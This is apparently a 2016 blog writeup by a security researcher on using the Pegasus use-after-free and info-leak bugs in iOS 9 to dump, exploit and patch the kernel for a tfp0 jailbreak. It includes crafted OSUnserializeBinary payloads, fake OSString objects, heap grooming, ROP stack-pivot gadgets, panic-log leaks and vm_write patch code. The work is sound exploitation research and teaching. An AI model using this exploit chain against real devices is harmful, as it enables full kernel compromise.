cl0ver

Siguza, 25. Dec 2016

tfp0 powered by Pegasus

Make Userland Great Again!

Introduction

On October 4th, @jndok did an amazing writeup on how to exploit the Pegasus vulnerabilities on OS X.
Shortly after that I started working on a tool to exploit them on iOS, in order to add the tfp0 kernel patch that has been missing from Pangu’s 9.0 and 9.2-9.3.3 jailbreaks. On December 4th, my tool had advanced enough for me to release a proof of concept video, it was still far from complete. I intended to bring it to full compatibility with as many devices and OS versions as possible, but shortly after my PoC, @qwertyoruiopz released a web-based reimplementation of the 9.2-9.3.3 jailbreak, which does have a tfp0 patch. Apparently I’ve also missed some ongoing efforts by Simone Ferrini/Benjamin Randazzo/@angelXwind to create a 32-bit jailbreak based on these vulnerabilities. And on December 15th Ian Beer killed it (once again) with his partial 10.1.1 jailbreak, which qwertyoruiopz is now turning into a full one, probably diverting everyone’s attention away from iOS 9 for good.
Of course huge props to all of them, but that kind of abolishes the need for an iOS 9 tfp0 patch. In light of that, I’m going to release my tool in an unfinished state and instead focus on this writeup.

So, here’s my demonstration of how to use the Pegasus vulnerabilities to dump, exploit and patch an iOS kernel in a way that can be done from within the sandbox and with only publicly available knowledge (i.e. no kernel dumps required).
I’m gonna leave it at applying the tfp0 patch here, but turning this into a full jailbreak should then be as “simple” as installing more patches to the kernel and other parts of the system, using tfp0 + the Mach APIs… it’s just gonna be a whole lot of work.

Now, If you haven’t already, I heavily suggest reading jndok’s writeup before continuing here.
The following are assumed to be well known/understood, and are explained in detail in his writeup:

Note: This project included a lot of “firsts” for me. I’ve never before: done ROP, played with IOKit, MIG or the kernel heap, etc, etc. As such it might be that this writeup contains some misconceptions or stuff that could be done a lot easier, faster or safer.
If you spot anything like that, please let me know (via GitHub issues, Twitter, Email (*@*.net where * = siguza), or whatever).
Also please don’t hesitate to contact me if there’s something you don’t understand, of if you’d like more details on something.

For the record, I’ve worked this up on an iPhone SE (iPhone8,4/N69AP) on 9.3.3/13G34 and an iPod touch 5G (iPod5,1/N78AP) on 9.3.2/ with only information and tools that are publicly available (not as an exercise for myself, but because I didn’t have anything else, lol).

Exploitation overview

Let’s first look at what jndok does on OS X:

That first step is gonna be a problem because on iOS <10, kernels are encrypted. There’s two ways around that:

Hardcoding stuff is ugly and there are hardly any decryption keys available for 64-bit devices (although nice work on that iPhone6,1, @xerub), therefore the former doesn’t seem like such a viable option. Without finding another exploit that allows us to dump the kernel, and without any friends willing capable of providing us with dumped/decrypted kernels, what can we do?
Well, we can corrupt a string. ;)

Let’s assume for a moment that we can get the kernel to still treat our corrupted string as an instance of OSString - then we merely need to change its buffer pointer to wherever we choose, and we can read back arbitrary kernel memory by calling IORegistryEntryGetProperty on that property. We’re gonna be restricted by the maximum MIG message size so we’ll have to do it in chunks, but we can effectively dump the entire kernel this way!
Now back to our assumption: How do we make the kernel treat our corrupted string still as an OSString? By setting the string’s vtable to the actual OSString vtable. In order to be able to do that, we’re gonna need to learn its address by some other means though.

So how do we gain knowledge of that address?
Note that vtables are stored in the __DATA.__const section, so once we know our vtab’s offset from the kernel base as well as the kernel slide, we’re all set.
Unfortunately, as far as I’m aware the vtable pointer cannot be obtained at runtime (through the Pegasus vulnerabilities and without prior knowledge, that is). But it’s only a single value, so hardcoding it is a lot more reasonable. Obtaining it once would be enough then.
Let’s see what we can come up with:

(Note: My iPhone SE and iPod touch 5G fell into the latter two categories.)

At this point we’ve conceptually taken care of the first point on jndok’s list. So what else is there?

We want to install a kernel patch to allow for tfp0, so we obviously need to add that to the list. Installing a kernel patch through ROP sounds unnecessarily complicated to me though, so let’s use ROP to merely retrieve the kernel task first without any patch, and then use the Mach APIs on the kernel to put the actual patch in place. And since we’re doing that using only methods accessible from within the sandbox, we can skip privilege escalation entirely.

Now, at last we have an idea what we want our process to look like:

With that laid out, let’s look at the details.

Preparations

Before we can actually get to pwning, we need to set up a few things.

Setting up the build environment

The Pegasus vulnerabilities are within IOKit, so linking against the IOKit framework is advisable. Apple’s iOS SDK doesn’t come with IOKit headers (anymore?), so we need to get them from elsewhere. We could copy them in from the IOKitUser source… or we could use those of OS X.
For that we create a local ./include directory that we later pass to the compiler with -I./include, and to where we simply symlink the IOKit header directory:

ln -s /System/Library/Frameworks/IOKit.framework/Headers ./include/IOKit

We also use some IOKit MIG functions, which are perfectly available on 32-bit (iokitmig.h) but private (non-exported) on 64-bit.
We could write a 32-bit binary able to exploit both a 32-bit and 64-bit kernel, but having the same data types and sizes as the kernel is just so much more convenient. And after all, generating the MIG routines yourself and statically linking against them turns out to be simple enough. I found very little info on this on the web though, so here’s the process in detail:

There’s a mig utility to create C source files from .defs, in the case of the IOKit MIG functions, xnu/osfmk/device/device.defs.
We run it as xcrun -sdk iphoneos mig to get the iOS environment and add -arch arm64 to set the correct target architecture (I’m not sure whether the generated C code differs at all between architectures, but at some point it might, so I’m trying to do this the correct way). Examining the file, we can also see that if the IOKIT macro is not defined, we get hardly anything, so we’re gonna add a -DIOKIT to our flags. Lastly, we need some other .defs files to be included but we can’t specify xnu/osfmk as an include directory because it contains some files that will #error when the architecture is neither i386 nor x86_64, so we symlink the following files (from xnu/osfmk) to our local ./include directory:

mach/clock_types.defs
mach/mach_types.defs
mach/std_types.defs
mach/machine/machine_types.defs

Finally we can run:

xcrun -sdk iphoneos mig \
-arch arm64 \
-DIOKIT \
-I./include \
xnu/osfmk/device/device.defs

This will generate three files:

iokit.h
iokitServer.c
iokitUser.c

Including iokit.h and iokitUser.c in our program will provide us with the full set of IOKit MIG functions. iokitServer.c isn’t needed as such, but it can still serve as a good reference to understand how exactly the kernel passes our MIG calls to its is_io_* functions.

(In my actual implementation I used /usr/include instead of xnu/osfmk because I can’t assert people to have the XNU source available in a predefined location, but that might stop working when XNU changes enough.)

Now we’re fully equipped to play with IOKit on both armv7 and arm64! :D

Recap: IOKit, data structures and the info leak

Without further ado, a quick recap/reference on some key points:

Part One: Obtaining the OSString vtable address

All of OSData, OSString and OSSymbol contain both a buffer pointer and length field, which we could abuse together with IORegistryEntryGetProperty to retrieve arbitrary kernel memory. So in theory, we could overwrite our freed OSString to mimic any of these. However:

So the OSString vtable it the one of choice. Now let’s look at how to get it.

The good: decrypted kernels

If keys are available, we can just grab the kernelcache from our IPSW, run it through xpwntool(-lite) and lzssdec, and we’ve got the raw kernel binary.
Since decrypted kernels are symbolicated, we merely have to search its symbol table for __ZTV8OSString (symbols starting with __ZTV are vtables):

$ nm kernel | grep __ZTV8OSString
803ece8c S __ZTV8OSString           # iPhone4,1 9.3.3
803f4e8c S __ZTV8OSString           # iPhone5,4 9.3.3
ffffff80044ef1e0 S __ZTV8OSString   # iPhone6,1 9.3.3

As one can see with a hex viewer (I’m using radare2 here), however (first column is offsets, rest is data):

$ r2 -c '0x803f4e8c; xw 32' -q iPhone5,4/kernel 2>/dev/null
0x803f4e8c  0x00000000 0x00000000 0x80321591 0x80321599  ..........2...2.
0x803f4e9c  0x8030d605 0x8030d4a5 0x8030d5fd 0x8030d5f5  ..0...0...0...0.
$ r2 -c '0xffffff80044ef1e0; xq 64' -q iPhone6,1/kernel 2>/dev/null
0xffffff80044ef1e0  0x0000000000000000  0x0000000000000000   ................
0xffffff80044ef1f0  0xffffff80043ea7c4  0xffffff80043ea7d0   ..>.......>.....
0xffffff80044ef200  0xffffff80043cea00  0xffffff80043ce864   ..<.....d.<.....
0xffffff80044ef210  0xffffff80043ce9f0  0xffffff80043ce9e0   ..<.......<.....

There are two machine words before the actual vtable, so the real address we’re looking for is at offset 2 * sizeof(void*) from the __ZTV... address.

The bad: panic logs

I stumbled across this method by accident while trying to play with OSStrings while they were freed (which won’t work due to heap poisoning).
Anyway, here are a few raw facts:

See what I’m getting at? :P
Here’s a visualization:

Normal heap layout

Now what happens when retain() is called on an OSString that was freed, but not yet reallocated?
In other words, what happens when we combine the above?

Reference to node in freelist

So what used to be our object’s vtable pointer is now a pointer to the next node in the freelist. And what is treated as a pointer to retain() is the value just out of bounds of that next node.
Now, is there any way of predicting what value that area of memory is gonna hold?

Now that we know what could be there, how can we make that happen? How can we arrange for our freed OSString to lie next to another OSString?
By making lots of strategical allocations and deallocations (hooray for Heap Feng Shui). And we can do that by passing dictionary with kOSSerializeStrings to io_service_open_extended for allocation, and the returned client handle to IOServiceClose for deallocation. So:

Visualized again:

Heap Feng Shui

(The dictionaries to achieve this are straightforward and make no use of any bugs so far.)

Now we’re gonna parse a rather simple dictionary:

uint32_t dict[5] =
{
    kOSSerializeMagic,                                              // Magic
    kOSSerializeEndCollection | kOSSerializeDictionary | 2,         // Dictionary with 2 entries

    kOSSerializeString | 4,                                         // String that'll get freed
    *((uint32_t*)"str"),
    kOSSerializeEndCollection | kOSSerializeObject | 1,             // Call ->retain() on the freed string
};

kOSSerializeString will cause an OSString to get allocated, hopefully in one of those lonely holes we’ve punched into the heap, and when it is freed again shortly after, we’re left with objsArray[1] holding a pointer to that chunk of memory that is surrounded by allocated OSStrings.
kOSSerializeObject will then attempt to call retain() on that chunk of freed memory, thus unfolding the process explained above, ultimately causing a kernel panic and logging the vtable address in the panic log:

panic(cpu 0 caller 0xffffff801befcc1c): "Kernel instruction fetch abort: pc=0xffffff801c2ef1f0 iss=0xf far=0xffffff801c2ef1f0. Note: the faulting frame may be missing in the backtrace."
Debugger message: panic
OS version: 13G34
Kernel version: Darwin Kernel Version 15.6.0: Mon Jun 20 20:10:22 PDT 2016; root:xnu-3248.60.9~1/RELEASE_ARM64_S8000
iBoot version: iBoot-2817.60.2
secure boot?: YES
Paniclog version: 5
Kernel slide:     0x0000000017e00000
Kernel text base: 0xffffff801be04000
Epoch Time:        sec       usec
  Boot    : 0x58225b8c 0x00000000
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x58225bec 0x00028e96

Panicked task 0xffffff811d67bdc0: 78 pages, 1 threads: pid 748: cl0ver
panicked thread: 0xffffff811f2f9000, backtrace: 0xffffff8012f03120
          lr: 0xffffff801bf043c4  fp: 0xffffff8012f03170
          lr: 0xffffff801be2e11c  fp: 0xffffff8012f031d0
          lr: 0xffffff801befcc1c  fp: 0xffffff8012f032c0
          lr: 0xffffff801befb1f0  fp: 0xffffff8012f032d0
          lr: 0xffffff801c1f0678  fp: 0xffffff8012f03720
          lr: 0xffffff801c25b4cc  fp: 0xffffff8012f03840
          lr: 0xffffff801bedaa00  fp: 0xffffff8012f038a0
          lr: 0xffffff801be194c8  fp: 0xffffff8012f03a30
          lr: 0xffffff801be27b78  fp: 0xffffff8012f03ad0
          lr: 0xffffff801befd6b0  fp: 0xffffff8012f03ba0
          lr: 0xffffff801befbd40  fp: 0xffffff8012f03c90
          lr: 0xffffff801befb1f0  fp: 0xffffff8012f03ca0
          lr: 0x00000001819b0fd8  fp: 0x0000000000000000

0xffffff801c2ef1f0 - 0x0000000017e00000 = 0xffffff80044ef1f0, there we go.

The full implementation of this can be found in the uaf_panic_leak_vtab function in uaf_panic.c.

The ugly: semi-blind guessing

Disclaimer: I can’t promise that this will work for every device and OS version, but it did on my iPod.

Our target is iPod5,1/9.3.2, so let’s first look at 9.3.2 for some other devices:

$ jtool -l -v iPhone4,1/kernel | head -9
LC 00: LC_SEGMENT               Mem: 0x80001000-0x803e6000      File: 0x0-0x3e5000      r-x/r-x __TEXT
        Mem: 0x80002000-0x803931a8      File: 0x00001000-0x003921a8             __TEXT.__text   (Normal)
        Mem: 0x803931b0-0x803a916c      File: 0x003921b0-0x003a816c             __TEXT.__const  
        Mem: 0x803a916c-0x803e59dd      File: 0x003a816c-0x003e49dd             __TEXT.__cstring        (C-String Literals)
LC 01: LC_SEGMENT               Mem: 0x803e6000-0x8045c000      File: 0x3e5000-0x411000 rw-/rw- __DATA
        Mem: 0x803e6000-0x803e60e8      File: 0x003e5000-0x003e50e8             __DATA.__nl_symbol_ptr  
        Mem: 0x803e60e8-0x803e61f0      File: 0x003e50e8-0x003e51f0             __DATA.__mod_init_func  (Module Init Function Ptrs)
        Mem: 0x803e61f0-0x803e62f4      File: 0x003e51f0-0x003e52f4             __DATA.__mod_term_func  (Module Termination Function Ptrs)
        Mem: 0x803e7000-0x803f67a0      File: 0x003e6000-0x003f57a0             __DATA.__const
$ nm iPhone4,1/kernel | grep __ZTV8OSString
803ece8c S __ZTV8OSString
$ jtool -l -v iPhone5,4/kernel | head -9
LC 00: LC_SEGMENT               Mem: 0x80001000-0x803ee000      File: 0x0-0x3ed000      r-x/r-x __TEXT
        Mem: 0x80002000-0x8039acc0      File: 0x00001000-0x00399cc0         __TEXT.__text   (Normal)
        Mem: 0x8039acc0-0x803b0c8c      File: 0x00399cc0-0x003afc8c         __TEXT.__const
        Mem: 0x803b0c8c-0x803ed894      File: 0x003afc8c-0x003ec894         __TEXT.__cstring        (C-String Literals)
LC 01: LC_SEGMENT               Mem: 0x803ee000-0x80464000      File: 0x3ed000-0x419000 rw-/rw- __DATA
        Mem: 0x803ee000-0x803ee0ec      File: 0x003ed000-0x003ed0ec         __DATA.__nl_symbol_ptr
        Mem: 0x803ee0ec-0x803ee1f4      File: 0x003ed0ec-0x003ed1f4         __DATA.__mod_init_func  (Module Init Function Ptrs)
        Mem: 0x803ee1f4-0x803ee2f8      File: 0x003ed1f4-0x003ed2f8         __DATA.__mod_term_func  (Module Termination Function Ptrs)
        Mem: 0x803ef000-0x803fe790      File: 0x003ee000-0x003fd790         __DATA.__const
$ nm iPhone5,4/kernel | grep __ZTV8OSString
803f4e8c S __ZTV8OSString

As we can see, __DATA.__const has different offsets, depending on the device, and so does the OSString vtable.
However, if we subtract the former from the latter: 0x803ece8c - 0x803e7000 = 0x803f4e8c - 0x803ef000 = 0x5e8c. It turns out that the vtable’s offset from __DATA.__const is the same for both. Could it be the same for the iPod5,1 as well?

First we need to learn the base address of __DATA.__const. That address is stored in the kernel’s mach header at offset 0x244. Since the data segment is non-executable, branching to that location will cause a panic.
Thus we use the UaF to construct an OSString whose vtable pointer points to 4 machine words before offset 0x244, i.e. kernel_base + kernel_slide + 0x224, so that a call to retain() will give us:

Incident Identifier: 0E7ED4DF-23F4-4669-A772-8B46A8D04BF2
CrashReporter Key:   b25fc727e5bd42cc472643168319ec8bb9b18dec
Hardware Model:      iPod5,1
Date/Time:           2016-12-17 23:42:38.38 +0100
OS Version:          iOS 9.3.2 (13F69)

panic(cpu 0 caller 0x<ptr>): sleh_abort: prefetch abort in kernel mode: fault_addr=0x857e7000
r0:   0x96961a40  r1: 0x857e7000  r2: 0x8c000001  r3: 0x00000001
r4:   0x8b07d7f0  r5: 0x00000001  r6: 0x00000034  r7: 0x800abd34
r8:   0x96961a40  r9: 0x00000034 r10: 0x80004034 r11: 0x00000001
r12:  0x85793043  sp: 0x800abcb4  lr: 0x8571eb69  pc: 0x857e7000
cpsr: 0x80000013 fsr: 0x0000000f far: 0x857e7000

Debugger message: panic
OS version: 13F69
Kernel version: Darwin Kernel Version 15.5.0: Mon Apr 18 16:44:05 PDT 2016; root:xnu-3248.50.21~4/RELEASE_ARM_S5L8942X
Paniclog version: 3
Kernel slide:     0x0000000005400000
Kernel text base: 0x85401000
  Boot    : 0x5855be8a 0x00000000
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x5855bf22 0x0009c5b9

Panicked task 0xc65784c8: 926 pages, 8 threads: pid 164: v3tta
panicked thread: 0xc67478b0, backtrace: 0x800aba00
        0x854c9b63
        0x854c9e39
        0x85420f63
        0x854ccc79
        0x854c6660
        0x8576fa7d
        0x854ab1c9
        0x85410c61
        0x8541be69
        0x854c62fc

Subtracting the kernel slide from the value in pc yields the unslid address of __DATA.__const: 0x803E7000.
That happens to be the same as for the iPhone4,1, so we assume our vtable address to be 0x803ece8c.
We can verify whether that is actually the case in the next step.

The full implementation of this can be found in the uaf_panic_leak_DATA_const_base and uaf_panic_read functions in uaf_panic.c.

Part Two: Dumping the kernel

With the OSString vtable and the kernel slide both known, we can construct valid(-ish) strings that point to wherever we choose.
Let’s see how we can use that to read a fixed amount of memory from an arbitrary address:

We start with an OSString:

OSString osstr;

Obviously it’s gonna need its vtable and the address we want to read from:

osstr.vtab = 0xffffff80044ef1f0 + get_kernel_slide(); // or 0x803ece94
osstr.string = address;

I’ll get back to the length later, for now we’re just gonna use the maximum MIG message size, i.e. 4096 bytes:

osstr.length = 0x1000;

Now there’s two fields left: retainCount and flags.

The retain count we set to something unrealistically high, so that a call to release() is never actually going to free anything. We want this because our OSString is actually the buffer of an OSData, which will be managed and freed as such, and interfering with that would only cause chaos and destruction.

osstr.retainCount = 100;

As for flags, there is exactly one recognised by OSString: kOSStringNoCopy, indicating the string doesn’t own its buffer and will not free or modify it.
I’m not sure it even makes a difference in this case, but we might as well set it:

osstr.flags = kOSStringNoCopy;

Now we have to build a payload for OSUnserializeBinary. Conceptually, it should suffice to have a dictionary containing:

If you test this in practice, however, you’ll always get a panic. This is because during deallocation, when release() gets called on the last of the above, the OSData before it will have been deallocated already, along with its buffer, which causes the underlying memory to get poisoned, so that a call to release() will end up trying to branch to some 0xdeadbeef.
We can work around that, however, by adding another kOSSerializeObject to the end of the dict, referencing the OSData, causing it to be retained until after release() has been called on the reference to the overwritten string.

Implementing all of the above, we get:

OSString osstr =
{
    .vtab = 0xffffff80044ef1f0 + get_kernel_slide(),                // or 0x803ece94
    .retainCount = 100,
    .flags = kOSStringNoCopy,
    .length = 0x1000,
    .string = address,
};
uint32_t *data = (uint32_t*)&osstr;
uint32_t dict[11 + sizeof(OSString) / sizeof(uint32_t)] =
{
    kOSSerializeMagic,                                              // Magic
    kOSSerializeEndCollection | kOSSerializeDictionary | 6,         // Dictionary with 6 entries

    kOSSerializeString | 4,                                         // String that will get freed
    *((uint32_t*)"str"),
    kOSSerializeData | sizeof(OSString),                            // OSData with same size as OSString
#ifdef __LP64__
    data[0],                                                        // vtable pointer (lower half)
    data[1],                                                        // vtable pointer (upper half)
    data[2],                                                        // retainCount
    data[3],                                                        // flags
    data[4],                                                        // length
    data[5],                                                        // (padding)
    data[6],                                                        // string pointer (lower half)
    data[7],                                                        // string pointer (upper half)
#else
    data[0],                                                        // vtable pointer
    data[1],                                                        // retainCount
    data[2],                                                        // flags
    data[3],                                                        // length
    data[4],                                                        // string pointer
#endif

    kOSSerializeSymbol | 4,                                         // Name that we're gonna use to retrieve bytes
    *((uint32_t*)"ref"),
    kOSSerializeObject | 1,                                         // Reference to the overwritten OSString

    kOSSerializeSymbol | 4,                                         // Create a reference to the OSData
    *((uint32_t*)"sav"),
    kOSSerializeEndCollection | kOSSerializeObject | 2,
};

With that figured out, back to the length that we put aside earlier: MIG let’s us pass at most 4096 bytes in or out of the kernel at once, so in order to dump arbitrary amounts of memory, we need to invoke the UaF in a loop (I don’t think this needs more explaining, it’s just math).

I’ve implemented the concept up until here in the uaf_get_bytes and uaf_read_naive functions in uaf_read.c. They’re not used anymore, but I left them in for demo purposes.

Now, with the above it is already possible do dump the kernel… provided you wait a sufficient amount of time between invocations. If you don’t, you’re likely to see your device panic. That is because ultimately, the UaF is a race condition.
When our OSString is freed, it gets added to the top of its zone’s freelist, and we count on it being there when our OSData’s buffer is allocated. If that is not the case, then the subsequent call to retain() will almost certainly cause a panic.

Now, I went through OSUnserializeBinary multiple times and I’m pretty confident that it doesn’t do any allocations or deallocations between our two key events… so from the perspective of a single thread, our assumption should hold. But in the multithreaded environment that is XNU, we’re very far from that.
There are a couple of things that can happen, for a couple of different reasons, and with a couple of different consequences:

With all of the above I managed to make dumping reasonably stable (never got a panic from the command line anymore, got about 20% panic from sandbox) and take less than a minute. At that point I gave up on trying to improve it further and instead added functionality to cache the required information (see offsets.c), so that once the kernel had been dumped, it would never have to be done again on that device.
Feel free to fiddle around with it though, and hopefully create a pull request if you manage to make it faster or more reliable. :)

With arbitrary read now more or less stable, dumping the kernel is trivial. But for the sake of completeness:

The full implementation of this can be found in the uaf_read and uaf_dump_kernel functions in uaf_read.c.

Part Three: ROP

Note: I haven’t done any of the following on 32-bit yet, and I’m not sure whether I will. For now this is 64-bit only.

Pivoting and restoring the stack

If you’ve read jndok’s writeup or have played with the Pegasus vulnerabilities yourself, then you know that our UaF gives us exactly one ROP gadget worth of execution. So we need to find a stack pivot.
But before we can go off and search for one, we first need to determine what requirements we have for it:

A good point to start is to examine which registers hold which values. By examining the disassembly of OSUnserializeXML (and possible looking at panic logs), I made out the following:

Let’s first sort out those we surely cannot use as a stack pivot loading address:

x0 or x28 would be perfect, as they point to a memory area whose contents are entirely controllable. However, I was unable to find a gadget that loads from x0 or x28.

I had my fair share of trouble finding a usable stack pivot. I looked at some docs discussing stack pivots on x86 and 32-bit ARM, and I have to say it looks to me like on those architectures it’s a lot easier than on arm64!
The only thing that I found at all mentioning stack pivots on arm64 was @qwertyoruiopz, saying it’s amazingly easy to find them. Luca, should you happen to read this, care to elaborate? :)

Now, I did eventually find a usable gadget:

0xffffff8005aea01c      3d79c1a8  ldp x29, x30, [x9], 0x10
0xffffff8005aea020      ff430091  add sp, sp, 0x10
0xffffff8005aea024      c0035fd6  ret

The way we use this gadget is as follows:

At that point we jump to a gadget that loads a value from the stack and stores it in any register that is convenient. And then we finally have both the address of the original stack frame, as well as a fake stack from which we’re running now. Of course, since the loaded value is x29 and not sp, we need to subtract the stack size of the calling function from it, which in the case of is_io_service_open_extended is 0x120, but that’s a trivial task now. It’s also a good idea to store that value to RAM somewhere, so that our ROP chain doesn’t corrupt it by accident.

After saving a pointer to the last stack frame and pivoting the stack, we run whatever ROP we actually wanted to run in the first place. Let’s put that aside for a moment though, I’ll get to it in a bit.

At the end of our ROP chain we need to make use of that stack pointer we saved earlier, and (preferably) return to somewhere within OSUnserializeXML.
The easiest way to restore the saved stack frame, is quite simple: when we save it to RAM at the beginning of our chain, we don’t just write it anywhere, but to a location further down on our stack, more precisely the location where x29 will be loaded from when we load our return address into x30. That requires knowledge of the exact length of our ROP chain and some precise counting, but it’s easily doable.
Paired with that we’re gonna need an address to return to, for simplicity most likely one within OSUnserializeXML. I chose 0xffffff80043f08c4 for now, which is at the end of OSUnserializeXML:

0xffffff80043f08c4      130080d2       movz x19, 0
0xffffff80043f08c8      e00313aa       mov x0, x19
0xffffff80043f08cc      bf4301d1       sub sp, x29, 0x50
0xffffff80043f08d0      fd7b45a9       ldp x29, x30, [sp, 0x50] ; [0x50:4]=0x4dc000 ; 'P'
0xffffff80043f08d4      f44f44a9       ldp x20, x19, [sp, 0x40] ; [0x40:4]=0x4dc000 ; '@'
0xffffff80043f08d8      f65743a9       ldp x22, x21, [sp, 0x30] ; [0x30:4]=0 ; '0'
0xffffff80043f08dc      f85f42a9       ldp x24, x23, [sp, 0x20] ; [0x20:4]=25
0xffffff80043f08e0      fa6741a9       ldp x26, x25, [sp, 0x10] ; [0x10:4]=13
0xffffff80043f08e4      fc6fc6a8       ldp x28, x27, [sp], 0x60
0xffffff80043f08e8      c0035fd6       ret

This basically means return 0;.
That is actually quite bad though, because it means that all memory allocated by the function will be leaked (i.e. all objects created while parsing, plus objsArray and stackArray), and because it will ultimately cause the call to return failure. If my tool was ever to go into production, that should definitely be fixed, but since it’s technically working, it was good enough for my demo.

The core of our chain

The goal of our ROP chain is simple: get the kernel task port!
We can make a plan of how to do that by walking through the code of task_for_pid (vm_unix.c, l. 632) and just pretend we were already past the pid == 0 check, and that p->task = kernel_task. Skipping all checks, it basically comes down to:

/* Grant task port access */
task_reference(p->task);
extmod_statistics_incr_task_for_pid(p->task);

sright = (void *) convert_task_to_port(p->task);
tret = ipc_port_copyout_send(
        sright,
        get_task_ipcspace(current_task()));

/* ... */

copyout((char *) &tret, task_addr, sizeof(mach_port_name_t));

Let’s simplify that.

So given a userland address task_addr, this is what we want to run in kernel mode:

*task_addr = ipc_port_copyout_send(ipc_port_make_send(kernel_task->itk_self), current_task()->itk_space);

Now, I’m not dumping the ROP chain generation code into this writeup. If you wanna have a look at it, you’re gonna need to see all of it, so go have a look at rop.c. It’s not pretty, but I’ve thoroughly annotated it, so hopefully you’ll be able to understand it.
The general concept of this “inner” ROP chain is:

In practice it’s a bit more complicated than that. For example, calling a function is straightforward in a normal program, but in ROP that actually requires you to first run a gadget that loads values into some registers (commonly x19 and upwards), and then a gadget that does a blr to such a register.
But the above is sort of a high-level view. If you want details, go look at the source. It’s quite understandable, I promise! :P

The full implementation of this can be found in rop.c (building the chain) and uaf_rop.c (executing the chain).

Finding offsets/addresses

Whether we’re manually looking for addresses or want to write code that does it for us (after all, hardcoding is ugly), we need a plan on how to identify them.

~Note: I planned for an offset finder to be implemented in find.c, but I haven’t gotten round to it. I’m just lining out how the addresses could be found.~

Update 10. Jan 2017:

For arm64, this has been fully implemented in find.c now.

Now, there’s two categories:

ROP gadgets
Those are really straightforward: You have a fixed sequence of opcodes you need, so all you have to do is walk through __TEXT and __PRELINK_TEXT until you find a 1:1 match (on a 4-byte boundary, that is).

The rest
Data addresses, data structure offsets and most functions are more complicated; we need something that uniquely identifies them.
The usual approach to this is to start at the address of something that is uniquely identifiable (such as a string or a very rare sequence of opcodes) and then find reference to or from that address or adjacent locations. I’ll briefly discuss everything that is not a ROP gadget (in my code, everything that doesn’t have registers in its name):

Part Four: Patching the kernel

The patch we’re gonna apply is as follows:

realhost.special[4] = kernel_task->itk_self;

With access to the kernel task port, applying that patch is a simple matter of using vm_read and vm_write (omitted error handling):

addr_t *special = (addr_t*)offsets.slid.data_realhost_special;
vm_address_t kernel_task_addr,
             kernel_self_port_addr;
vm_size_t size;

// Get address of kernel task
size = sizeof(kernel_task_addr);
vm_read_overwrite(kernel_task, (vm_address_t)offsets.slid.data_kernel_task, sizeof(kernel_task_addr), (vm_address_t)&kernel_task_addr, &size);

// Get address of kernel task/self port
size = sizeof(kernel_self_port_addr);
vm_read_overwrite(kernel_task, kernel_task_addr + offsets.unslid.off_task_itk_self, sizeof(kernel_self_port_addr), (vm_address_t)&kernel_self_port_addr, &size);

// Write to realhost.special[4]
vm_write(kernel_task, (vm_address_t)(&special[4]), (vm_address_t)&kernel_self_port_addr, sizeof(kernel_self_port_addr));

This isn’t technically true to the name “tfp0”, but it allows any binary running as root to retrieve the kernel task port via

host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &kernel_task);

The full implementation of this can be found in the patch_host_special_port_4 function in exploit.c

Conclusion

Holy. Shit.

That was awesome!
It was also a whole lot of work, and this writeup is by far the longest thing I’ve ever written.
Glad you stayed with me ‘till the end! :D

And phew, I’ve learned an insane amount of things while doing this. I had doubts whether I was even gonna make it to the end, but it turns out I did, and I’m glad about that.
If you’re trying to get into exploitation like me, I can only recommend doing a project like this. Grab some publicly disclosed vulnerabilities that have been fixed in the latest iOS but to which your device is still vulnerable, start playing around with them, and see what you can get out of it. No amount of reading could replace such an experience. :)

Now, I will definitely continue to poke around in iOS, and if you’re interested in reading about it, you can follow me on Twitter.
And as stated at the beginning, please feel free to reach out to me if you have any kind of comments or questions. :)

Anything left to say?

Code

The code I wrote for this project is open source and available on GitHub, licensed under MIT.
(I simply named it after the leaf on my avatar, clover.)

Credits & thanks

First and foremost I would like to thank @jndok (as well as all the people he credits and thanks) for his amazing writeup and the accompanying PoC. My work here is entirely based on yours.

Also thanks to: